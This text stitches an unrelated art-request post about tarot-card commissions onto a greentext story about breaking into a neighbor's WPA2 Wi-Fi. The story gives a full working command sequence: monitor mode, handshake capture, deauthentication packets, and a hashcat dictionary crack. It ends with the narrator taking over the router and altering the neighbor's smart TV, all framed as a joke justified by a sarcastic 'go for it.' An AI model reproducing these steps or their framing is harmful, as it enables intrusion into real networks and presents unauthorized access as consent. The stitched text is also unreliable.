✨YOUR OC AS A TAROT CARD!✨
I'm creating a complete tarot deck & YOU can be a part of it! (A physical set will be available later)
To enter:
🖼️ Comment with your OC's name
❤️ Like & 🔁 Repost
✨Good luck! ✨
#ArtRequest#OC#Tarot#YCH#FantasyWorlds#GermanArtist#MLP
The Neighbor's Challenge: Hacking his sweet 1Gbps WiFi
> > be me
> > moving into new apartment
> > ISP says "3 weeks for installation"
> > absolute-disaster.jpg
> > see neighbor in hallway
> > "Hey, can I pay you to use your Wi-Fi for a week?"
> > neighbor looks at my hoodie and glasses
> > "No. If you want internet so bad, why don't you just hack it, Mr. Robot?"
> > neighbor laughs and slams door
> > wait... did he just give me permission?
> > "Are you sure? You really want me to try?" I yell through the wood.
> > "Yeah, go for it, nerd!"
> > challenge accepted.
>
Phase 1: The Setup
> > walk back to my dark room
> > boot up my Fujistu E744
> > Kali Linux logo glows in the dark
> > pull out the Alfa AW... wireless adapter
> > the high-gain antenna looks like a weapon of war
> > lsusb ... adapter detected.
> > airmon-ng start wlan0
> > monitor mode enabled. I am now the ghost in the machine.
>
Phase 2: The Reconnaissance
> > airodump-ng wlan0mon
> > scanning the airwaves like a digital bloodhound
> > there it is: "Pretty_Fly_For_A_WiFi"
> > WPA2-PSK. Strong signal. One client connected.
> > time to intercept the handshake.
> > airodump-ng -c 6 --bssid [MAC_ADDRESS] -w capture wlan0mon
>
Phase 3: The Deauthentication
> > neighbor is probably watching Netflix
> > time to briefly disrupt the peace
> > aireplay-ng -0 5 -a [BSSID] -c [CLIENT_MAC] wlan0mon
> > send deauth packets
> > neighbor's laptop or Tv disconnects for a split second
> > it automatically tries to reconnect
> > it sends the encrypted handshake into the void
> > I catch it.
> > "WPA Handshake: [MAC]" appears in the corner
> > I have the prize.
>
Phase 4: The Crack
> > hashcat -m 2500 capture.hccapx rockyou.txt
> > GPU fans start screaming like a jet engine
> > 5,000,000 guesses per second
> > 2 minutes pass...
> > STATUS: CRACKED
> > Password: password123
> > are you kidding me?
>
The Aftermath
> > log in to his router settings
> > change his SSID to "I_SHOULD_HAVE_SHARED"
> > change his wallpaper on his smart TV to a picture of a kitten
> > walk back over and knock on the door
> > neighbor opens it, looking annoyed
> > "Hey man, your Wi-Fi name is a bit weird, and you might want to check your TV."
> > show him the password on my phone
> > neighbor turns pale
> > "So... can I have that guest password now?"
> > he gives it to me for free.
> > mfw I have 1Gbps fiber for the cost of a 2-minute crack.